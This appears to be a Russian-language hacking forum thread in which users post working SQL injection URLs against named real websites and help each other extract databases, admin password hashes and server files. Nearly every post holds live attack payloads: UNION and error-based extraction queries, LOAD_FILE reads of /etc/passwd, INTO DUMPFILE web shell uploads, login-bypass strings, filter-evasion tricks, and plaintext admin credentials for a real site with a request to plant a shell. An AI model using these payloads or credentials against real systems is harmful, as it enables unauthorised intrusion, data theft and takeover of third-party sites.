проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user

если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?


в базе данных "mysql" информация о юзверях всегда в табличке "user", во-первых.

Во вторых, для начала проверь есть ли доступ к "mysql.user" - если нет, то file_priv в 95% случаев нет


Смотришь, есть ли доступ к mysql.user.

http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+2,2,3,4+from+mysql.user

Доступа нет.

если нету доступа, то другими способами средствами SQL залить шелл реально?

нет, с помощью скули не залить если нет условий для создания файла на серваке посредством БД

Подскажите, пожалуйста, есть здесь SQL Иньекция или нет?
http://www.klipart.ru/package.php?id=symmetricspiders'

нашел sql уязвимость

выдает ошибку
SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '595'' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'active'' at line 3

после SELECT * FROM mobiticket.structure_page WHERE tag = '595'' идет AND

до AND сработает union? /* не обрыв строки? спасибо!
Чего бы и нет.
-1'+union+select+1+--+ и т.д.

ребят, хочу залить шелл посредством SQL, а именно:

union+select+1,'<?php код вашего шелла ?>',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*

php код вашего шелла - сюда не вариант ведь пихать весь код, например, шелла от madnet'a.
Посоветуйте, какой "мини" шелл или команду выполнить там, чтобы потом можно было залить полноценный шелл?
если есть все условия для шела через скуль, то мона форму загрузки файла с оброботчиком запихнуть, а потом через веб залить нормальный шелл, как вариант

я только что залил шелл wso 2.4 на сайт, но при попытке зайти пишется:
Fatal error: Call to undefined function: gzinflate()
сервер - Apache/2.0.59 (Unix) PHP/4.4.6
c99 нормально работает, но всё-таки хотелось бы узнать причину..

wso походу сжат и использует функцию gzinflate() для распаковки данных. возможно на сервере отключена или не инсталлирована эта функция(библиотека)

не могу проверить привилегии
http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,file_priv,3,4,5,6,7+from+mysql.u ser+where+user='tourismepmysql'--

доступ к mysql.user вродь есть, в чем трабла?

С помощью LOAD_FILE проверь.

не могу проверить привилегии
http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,file_priv,3,4,5,6,7+from+mysql.u ser+where+user='tourismepmysql'--

доступ к mysql.user вродь есть, в чем трабла?


http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,user,3,4,5,6,7+from+mysql.user--

SELECT command denied to user: 'tourismepmysql@10.0.65.117' for table 'user'


1. Нет прав на таблу mysql.user - не проверишь
2. Magic_quotes = ON, where user = 0x746f757269736d65706d7973716c
3. Слушать BlackSun, но помнить про Magic_quotes = ON

бес брута достать логин и пасс возможно!? При обращении к схеме у меня была ошибка... Разве что с not null попробывать.
_http://www.plan-art.co.uk/case.php?id=116+and+%281,2%29=%28select+*+from+%28 select+name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29+from+admin%29a%20%29Ы_Ы
Решено :
_http://www.plan-art.co.uk/case.php?id=116+and+%28select+*+from+admin+union+s elect+1,2%0%29=%281,2%29Query failed: Column 'password' cannot be null
_http://www.plan-art.co.uk/case.php?id=116+and+%28select+*+from+admin+union+s elect+1%0,2%29=%281,2%29Query failed: Column 'username' cannot be null

Тока таблица admin пустая1
Что со схемой - ХЗ! :)

я только что залил шелл wso 2.4 на сайт, но при попытке зайти пишется:
Fatal error: Call to undefined function: gzinflate()
сервер - Apache/2.0.59 (Unix) PHP/4.4.6
c99 нормально работает, но всё-таки хотелось бы узнать причину..

Для работы функции gzinflate необходима библиотека zlib, она появилась в php с версии 4.0.4. По умолчанию поддержка этой библиотеки в PHP не включена. Так что можешь попробовать покапаться в исходниках wso и найти упакованную строку функцией gzdeflate и распаковать у себя, а на сервак залить уже без использования этих функций :)

На этом сайте:


http://qatarlc.net/page.php?id=-15+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8+from+test.admin+--+

у админа странный хэш:

1:super:202cb962ac59075b964b07152d234b70200820e322 7815ed1756a6b531e7e0d2

админка тут:

http://qatarlc.net/admin/

Подбор хэша:

202cb962ac59075b964b07152d234b70 - 123
200820e3227815ed1756a6b531e7e0d2 - qwe123

Но, это не проходит.

Как еще можно подобрать хэш, чтобы попасть а админку?

FlaktW,
login: 'or+5=5/*
password: asdfgh
:D

На этом сайте:
http://qatarlc.net/page.php?id=-15+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8+from+test.admin+--+

А почему ты решил, что БД test, а не qatarlc_DB, как говорится в database()?

warlok, или login: ' or 1=1#
password: qwerty
:D

на руках лежит "/etc/passwd". как его рационально использовать? можно на фтп попасть?

# $FreeBSD: src/etc/master.passwd,v 1.40.20.1 2009/04/15 03:14:26 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
webmaster:*:1001:0:User &:/home/webmaster:/bin/sh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
ftp:*:14:5:Anonymous Ftp:/var/ftp:/nonexistent


cпасибо!

olishort
Нельзя. Пассы можно увидеть в master.passwd, но для этого надо иметь права высокие.

если у тебя file_priv:Y (есть возможность читать файлы на сервере), попробуй читать исходники страниц сайта...это может очень помочь

Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл

да, file_priv:Y. /etc/passwd отлично читает. пытался найти через ошибки.

usr/local/www/apache22/data/http/avia/aeroport.php
пропуская все через hex. не открывает. ошибок не выводит. пытаюсь залить шелл через mysql. magic_quotes=on. почитал на ачате как обойти. не получается.

почитал статью https://forum.antichat.ru/showpost.php?p=663815&postcount=39

мой запрос

http://localhost/avia/aeroport.php?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--


все выводит. пытаюсь сделать через второй запрос, чтобы обойти magic_quotes.
заместо единицы вставляю hex кусок.
-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
основной запрос проходит, второй с ошибками. вроде все правильно делаю. подскажите в чем моя ошибка. спасибо

основной запрос проходит, второй с ошибками. вроде все правильно делаю. подскажите в чем моя ошибка. спасибо -- -коментарий который отбрасывает конец запроса. /* */ - это окмментарий который отбрасывает середину

Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл


так у самого юзверя БД права файловые есть?

так у самого юзверя БД права файловые есть?
нет к сожаленью, если бы были то не спрашивал бы

нет к сожаленью, если бы были то не спрашивал бы


Ну тогда не зальешь. Да даже если бы и были права, и получилось бы залить php-шелл, то ты был бы в той же ситуации, что и сейчас - править, заливать не сможешь ничего. PHP под IIS(а там он судя по описанию) обычно сильно урезан в правах. Попробуй ливануть asp-шелл или coldfusion (если там стоит)

-- -коментарий который отбрасывает конец запроса. /* */ - это окмментарий который отбрасывает середину

/* - у меня там не срабатывает при подстановке. т.е

-93+union+select+1,2/* не прокатит

Есть админка: http://www.rbeurope.org/admin
Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*.
Что можно еще сделать?

Есть админка: http://www.rbeurope.org/admin
Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*.
Что можно еще сделать?
Если действительно фильтруеться слеш и нужно отбросить запрос, попробуй "--" или "--+" или ")--+", если там канечно в этом дело, посмотреть не могу.

_http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,version% 28%29,25,26,27--+Таблицы:
articole:butic_livrari:butic_optiuni:butic_zone:ca t_activite:citizenships:county:docs:emails:events: eventsdetails:eventspictures:hotel_prices:imagini: institute:letters:limbi:livration:mesaje:mesaje_ad min:mesaje_old:monede:newsletter:persons:pictures: plati:plati_backup:produse:registration_fees:rezer vari_hotel:scroll:seminar:sess:specific:tari:users :users_backup _http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,GROUP_CO NCAT%28COLUMN_NAME%20SEPARATOR%200x3a%29%20,25,26, 27+FROM%20information_schema.COLUMNS%20WHERE%20TAB LE_NAME=0x7573657273--+Колонки users:
id:title:lastname:firstname:email:password:positio n:organization:postal_address:compl_address:zip_co de:town:id_tari:id_citizenships:phone:fax:nametag_ name:nametag_affiliation:reg_fees:dinner1:dinner2: flag:platit:valoare
_http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_w s%280x3a,email,password%29%20,25,26,27+FROM+users+ limit+303,1--+Кстати, не набирайте никто http://www.rbeurope.org/login.php :)

Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл


если шелл нормально не функционирует значит проблема с правами или/и php safe mode=on

Есть админка: http://www.rbeurope.org/admin
Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*.
Что можно еще сделать?

А с чего ты взял, что там возможно так авторизоваться? о_0
Тем более там Basic-auth, она с БД не связана никак.

если шелл нормально не функционирует значит проблема с правами или/и php safe mode=on
интересно что ты мне этим хотел сказать? вроде здесь вопросы задают и отвечают на них если реально знают что и как..а ты что мне посоветовал ? или хочешь мне указать какой я глупый что не увидел сейф мод?.... я шеллов перевидал не мало...и если спрашиваю что и как то значит ситуация неординарная....
и кстати сейф мод офф и папки и файлы все зеленые если ты понимаешь что я имею в виду, я вроде написал выше что смущает меня то что везде вроде права зеленые , но ни править ни заливать ничего нельзя.... надеюсь сейчас нормальным турецким языком отписал? и все меня поняли

смущает меня то что везде вроде права зеленые , но ни править ни заливать ничего нельзя.... надеюсь сейчас нормальным турецким языком отписал? и все меня поняли


в венде нет прав как в линуксе - 777, 755 и прочего. php видит файлы как 666, а директории как 777(хотя это условности, которые ничего не значат). А права доступа устанавливаются в IIS и в настройках серва.

в венде нет прав как в линуксе - 777, 755 и прочего. php видит файлы как 666, а директории как 777(хотя это условности, которые ничего не значат). А права доступа устанавливаются в IIS и в настройках серва.Я устанавливал двиг какой то, непомню, на винде(стоит денвер!) и не мог попасть на сайт после установки. Изменил через функцию chmod в пхп файл, права которого было указано что надо изменить, то пустило.Как это понимать хз, так как на винде нет прав!?
ps не надо говорить что я чето завтыкал!

))) это просто слет какой-то сегодня )

http://www.4ips.biz/products.php?id=71+union+select+1,2,3,4%20--
через order by получается что 4 колонки но подставляя пишет что не верное кол-во, пробывал менять лимит - бесполезно

и ещё: чем можно заменить знак кавычки кроме как через hex?

http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+pic s_db+group+by+2+limit+1)a)

и ещё: чем можно заменить знак кавычки кроме как через hex?
CHAR

Pashkela а как ты узнал о существовании таблицы pics_db, брут?
и как через такую ошибку, зная название таблицы можно узнать название столбцов?

http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),co ncat((select+pic s_db.*),floor(rand(0)*2))+from+pic s_db+group+by+2+limit+1)a)

?

Pashkela а как ты узнал о существовании таблицы pics_db, брут?


нет:


http://www.4ips.biz/products.php?id=71+or+1=1+union+select+1,2,3,4+lim it+0,1

to use near 'ORDER BY pics_db.pics_id DESC'


а названия столбцов только брутить (как и остальных таблиц), кроме столбца pics_id:

http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),co ncat((select+pics_id+from+pics_db+limit+0,1),floor (rand(0)*2))+from+pics_db+group+by+2+limit+0,1)a)

Pashkela а как ты узнал о существовании таблицы pics_db, брут?Можна не знать названия таблицы и какую нить ин-ию вытащить ис переменных и функций! _http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3)x+group+by+2+ limit+1)a)Есть admin_db, но там скорее одна запись || пустая -> ошибку не выплевывает!
Вот еще путь выдрал, если надо!
Unable to save result set in /hsphere/local/home/sitang/4ips.biz/products.php on line 57

у мну вот такая проблема.. есть уязвимость MSSQL..
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
/products.asp, line 22
и стоит защита типа на SELECT,VERSION,TABLE идт..
с SELECT все испробовал идет тока ('sel'+'ect')
как дальше я хД
всевремя перекидует на www.site.ru/Rejected-By-UrlScan/?~/products.asp?cat=select

з.ы (('sel'+'ect')+top+1+???+FROM+INFORMATION _SCHEMA.????)

2 попугай

attrib /?

2 попугай

используют это http://www.codenet.ru/webmast/iis/htm/core/iiacnsc.php#NTFSpermissions

Есть такая скуль
__http://www.ykjw.gov.cn/newsinfo.php?id=-214+union+select+1,group_concat(concat(uid,0x3a,pw d)),3,4,5,6+from+administrator

никак не могу админку найти
доступ к mysql.user закрыт и file_priv=NO
как тут можно выкрутиться?

Блин, подскажите директории где обычно бывают админки или как её вообще найти. Robots.txt нету, структуру сайта сканил - ничего, визуально тоже нет такого, самые простые URLы подставлял (/admin,/admin.php и т.д.) - ничего.

Заранее спасибо

Блин, подскажите директории где обычно бывают админки или как её вообще найти. Robots.txt нету, структуру сайта сканил - ничего, визуально тоже нет такого, самые простые URLы подставлял (/admin,/admin.php и т.д.) - ничего.

Заранее спасибо

http://rapidshare.com/files/273513716/adminfinder.rar.html

link was dead!

try this one

http://uploading.com/files/KCDVDDST/adminfinder.rar.html

link was dead!

try this one

http://uploading.com/files/KCDVDDST/adminfinder.rar.html

Yes, thanks, good program, but dont help me with my site...

Помогите определить версию БД

http://www.opderschmelz.lu/index.php?id=10;event=(select+1+from+(select+count (0),concat((select+version()),floor(rand(0)*2))+fr om+(select+1+union+select+2+union+select+3)x+group +by+2+limit+1)a)


http://www.opderschmelz.lu/admin/

набираю 'or+5=5/*

не проходит

Помогите определить версию БД_http://www.opderschmelz.lu/index.php?id=10;event=415+and+5=@@version5 ветка!

http://www.opderschmelz.lu/index.php?id=10;event=415+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,v ersion(),25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52+limit+1 ,1/*

5.0.32-Debian_7etch10-log

Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:

http://www.lavozindependiente.com/news.php?nid=517'

Что то сам пытался..

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=fa lse

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=tr ue

Вопрос по XSS
Подскажите как можно получить все куки, если часть куков имеют флаг HttpOnly, и javascript не может получить доступ к ним.
Пробовал использовать обьект XMLHttpRequest, но и он не может извлечь куки.

Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:

http://www.lavozindependiente.com/news.php?nid=517'

Что то сам пытался..

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=fa lse

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=tr ue


http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)= 5

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db


дальше сложнее, т.к. и union и select фильтруются неподецки

Здравствуйте есть скуля http://stats.freearena.ru/cs_SuperHero/sh_hero.php?hero=1'+union+select+id,2,3,4,5,6,7+FR OM+'Users'+limit+1,1/*
через INFORMATION_SCHEMA.TABLES нашел табл. users пытаюсь вывести не хочет выводить может прав нету или она в другой бд висит?

http://stats.freearena.ru/cs_SuperHero/sh_hero.php?hero=1'+union+select+count(id),2,3,4,5 ,6,7+from+users/*


1 - запись только. Users в кавычки брать не надо

спасибо) но так не интересно была бы бд общая)

http://cstrike.freearena.ru/stats/cs/Classic/index.php тут шелл залить никак нельзя?

Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:

http://www.lavozindependiente.com/news.php?nid=517'

Что то сам пытался..

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=fa lse

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=tr ue


вот статья одного парня, желательно прочесть:

https://forum.antichat.ru/thread104591.html

http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)= 5

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db


дальше сложнее, т.к. и union и select фильтруются неподецки

От души бро !

_http://shop.rappers.in/alph_search_result.php?page=-2 тут вообще чтото можно сделать? с этой ecommerce... =(

']_http://shop.rappers.in/alph_search_result.php?page=-2 тут вообще чтото можно сделать? с этой ecommerce... =(
так вроде нет sql инъекции просто ошибка

']_http://shop.rappers.in/alph_search_result.php?page=-2 тут вообще чтото можно сделать? с этой ecommerce... =(
Переменная в число кажется преобразовывается, ничего сделать нельзя.

Парни подскажите хорошую статью о проведении sqli в Oracle .

http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)= 5

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db


дальше сложнее, т.к. и union и select фильтруются неподецки

Pashkela как ты обошел фильтрацию, чтобы вытянуть это:

user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
version(): 5.1.44


http://www.lavozindependiente.com/microsite.php?cha=66+order+by+3+--+

http://www.lavozindependiente.com/microsite.php?cha=-66+union+select+1,2,3+--+

Я пробовал, у меня не получается.

Ну там же явно написано, крутил как слепую, по правилам (классическим) blind sql injection, для получения системной информации не требуется ни union, ни select

Парни подскажите хорошую статью о проведении sqli в Oracle .
https://forum.antichat.ru/thread40576.html
https://forum.antichat.ru/thread162060.html
https://forum.antichat.ru/thread161670.html

deleted

тут данные можно вывести ?
http://www.ruraldoc.com.au/content_sub.php?id=-1+union+select+1,2,3,4,5,6--

2daniel_1024
http://www.ruraldoc.com.au/content_sub.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os))),4,5, 6--

http://www.ruraldoc.com.au/content_sub.php?id=(select(1)from(select+count(0), concat((select(version())),floor(rand(0)*2))from(s econd_level)+group+by+2)a)


))

Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love

Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd

На что система мне выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '../.../.../.../.../.../.../../../.../etc/passwd' at line 1 SELECT `id`, `title` FROM `statpage` WHERE `sid`

http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться

Вообщем, если ли тут иньекция?
Инклуд или скуль?

http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+c ount(0),concat((select(version())),floor(rand(0)*2 ))from(statpage)+group+by+2)a)--+


))

Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love

Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd

На что система мне выдает:


http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться

Вообщем, если ли тут иньекция?
Инклуд или скуль?

инклуд нету потому что love это значение колонки "сид" в бд, а не файл

Понял.
Тогда почему используется функция
(select(1)from(select+count(0),concat((select(vers ion())),floor(rand(0)*2 ))from(statpage)+group+by+2)a)--+

Кодирование это понятно, только почему в такой последовательности и "--+" - какое имеет значение для уязвимого запроса?

Ershik.

"--+" - плюсом "обрезают комментарий"

Понятно.
Я хочу выяснить наименование столбцов и полей.
По типу:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --
:
Произвожу иньекцию, подобно этой:
http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+c ount(0),concat((select(TABLE_NAME)),floor(rand(0)* 2))from(statpage)+FROM
+INFORMATION_SCHEMA.TABLES+LIMIT+1,1)a)--+

Я не совсем понимаю механизм заключения все в concat и floor

Существует какой-то онлайн сервис или программа для преобразования?
Как с его помощью можно вытащить названия таблиц, полей?

тыцк (https://forum.antichat.net/thread148915-toolza.html)


$method = 0; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$f_table = "statpage";
$f_url = "http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from"; # url
$f_plus = "+"; #
$f_filtr = "a)--+";



System information:
-----------------------------------------
ver:5.0.51a-24+lenny2
datadir:/var/lib/mysql/
os:debian-linux-gnu
base:mihadmin_main
basedir:/usr/
tmpdir:/tmp
-----------------------------------------
Tables in information_schema.tables - 27
-----------------------------------------
COLLATIONS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
article
const
group
group_refer
menu
rights
statpage
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
news
rights_refer
user

Я не совсем понимаю механизм заключения все в concat и floor

Существует какой-то онлайн сервис или программа для преобразования?
Как с его помощью можно вытащить названия таблиц, полей? Посмотри тут пример: https://forum.antichat.ru/showpost.php?p=1802753&postcount=21

Посмотри тут пример: https://forum.antichat.ru/showpost.php?p=1802753&postcount=21

извиняюсь, не могли бы вы продемонстрировать метод из приведенной статьи на этом живом примере, который спросил ТС? Например для получения списка тех же таблиц из information_schema.tables

Поддерживаю.
Без примеров сложно вкуривается.))

извиняюсь, не могли бы вы продемонстрировать метод из приведенной статьи на этом живом примере, который спросил ТС? Например для получения списка тех же таблиц из information_schema.tables Разумеется:

http://mihadmin.ru/statpage.php?sid=-1+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by concat(mid((select+TABLE_NAME+from+INFORMATION_SCH EMA.TABLES+limit+1,1),1,64),floor(rand(0)*2)))z)

И в самом верху вижу:

Duplicate entry 'COLLATIONS1' for key 1

З.Ы.
Ну а дальше меняем значение в лимите, сам запрос в mid(...).

2 Qwazar:

класс, спасибо

http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+version()),floor(rand(0)*2))+from+produ cts+group+by+2+limit+1)a)

к сожалению не докрутил скуль в силу своей неопытности.
Господа обьясните как через эту ошибку можно вывести названия столбцов. Так не вышло:

http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+table_name),floor(rand(0)*2))+from+info rmation_schema.tables+group+by+2+limit+0,1)a

Онлайн шоп с PR3

http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+version()),floor(rand(0)*2))+from+produ cts+group+by+2+limit+1)a)

к сожалению не докрутил скуль в силу своей неопытности.
Господа обьясните как через эту ошибку можно вывести названия столбцов. Так не вышло:

http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+table_name),floor(rand(0)*2))+from+info rmation_schema.tables+group+by+2+limit+0,1)a

Ну вот только что обсуждали:


http://www.gemreplica.com/about.php?cid=(select*from(select+count(*)from(sel ect+1+union+select+2+union+select+3)x+group+by%20c oncat(mid((select+TABLE_NAME+from+INFORMATION_SCHE MA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)


плз внимательней

Кстати, фигня такая, типо мелочь, вот этих

union+select+2

не обязательно должно соответствовать кол-ву колонок, главное чтобы их было => чем надо, причем > тут имеет ключевое значение, как оказалось в данном конкретном примере. Т.е. в итоге получается необязательно подбирать точное кол-во, жесть.

т.е. ссылка выше выдаст тоже самое, что и такой вот запрос:


http://www.gemreplica.com/about.php?cid=(select*from(select+count(*)from(sel ect+1+union+select+2+union+select+3+union+select+3 +union+select+3+union+select+3+union+select+3+unio n+select+3+union+select+3+union+select+3+union+sel ect+3+union+select+3+union+select+3+union+select+3 )x+group+by+concat(mid((select+TABLE_NAME+from+INF ORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand (0)*2)))z)


И, что примечательно, это так и есть, и в итоге является наиболее крутым методом при проведении такого рода sql-injection, т.к. не требует ни точного подбора кол-ва столбцов, ни знания названия вообще какой-либо таблицы:


http://mihadmin.ru/statpage.php?sid=love'+and+(select*from(select+cou nt(*)from(select+1+union+select+2+union+select+3+u nion+select+3+union+select+3+union+select+3+union+ select+3+union+select+3+union+select+3+union+selec t+3+union+select+3+union+select+3+union+select+3+u nion+select+3)x+group+by+concat(mid((select+versio n()+limit+0,1),1,64),floor(rand(0)*2)))z)--+


union+select+3 проставлено просто от балды много

Скажите пож-та в последней версии Firefox хочу посмотреть пароль через исходный код фрейма а он не показывает. Подскажите почему! Пароль хочу посмотреть на модеме! За ранее спасибки!

Есть админка: http://www.ettisalqatar.com/Admin

admin:zameer8847
janak:info123

Помогите залить Shell.

Pashkela, ознакомся (второе предложение) https://forum.antichat.ru/showpost.php?p=1796647&postcount=20

Есть залитый шелл, но выбраться выше public_html нельзя из-за open_basedir. Но ls, cat и другие консольные команды работают и позволяют выбраться в public_html любого домена, висящего на этом хосте. В случае если доменов мало, можно просто слить еще один шелл в другой домен и разбираться уже через него, но когда доменов много... Поэтому:
1. Есть ли способы обойти open_basedir? (PHP 5.1.2)
2. Возможно бред, но есть ли веб-шелл, работающий практически полностью на одних консольных командах?

open_basedir не действует на PERL. Попробуй это.

В cgi-bin прав на запись нет, заливаю test.pl в произвольную папку, предварительно создав .htaccess c таким содержанием:

Получаю:


Perl точно установлен, т.к. через perl script.pl все работает.


Набираю в Opera:

http://www.ettisalqatar.com/cgi-script/test.pl

http://www.ettisalqatar.com/cgi-bin/test.pl

http://www.ettisalqatar.com/cgi-script/script.pl

http://www.ettisalqatar.com/cgi-bin/script.pl

Не могу найти shell.

И, подскажите статью по заливке Perl Shell.

Заранее всем спасибо.

Есть сайт, он подвержен SQL инъекции, знаю потому что получил лог и пас от админки, но толку с этого мало, так как встроеный в админку загрузчик переименовывает любой фаил по шаблону целиком в .gif Сервер же со своей стороны не дает возможности исполнять gif. Так же хостер (или админ) не дурак и прав у юзера SQL базы недостаточно на чтние /etc/password, выдает пустой экран, в смысле сюль рагирует позитивно но ничего не сгружает (проверял фаер багом на предмет скрытого теста, но пусто). Отсюда резонный вопрос, что посоветуете делать и как извернутся?

чуть не забыл на сервере включенный магические кавычки, но CHAR не лечит, как впрочем 16чная система, прав нет. залить, через sql то же не получилось, возможно что то не так делаю, собственно сам линк инъекции в студии
http://www.site.ru/news.php?id=-99999999+union+select+load_file(0x2f6574632f706173 737764),2,3 /*
(попытка чтения етц)
Если резюмировать, то вопросов 2а, как надуть загрузчик фаилов или как правильно залить шел через SQL (MySQL)
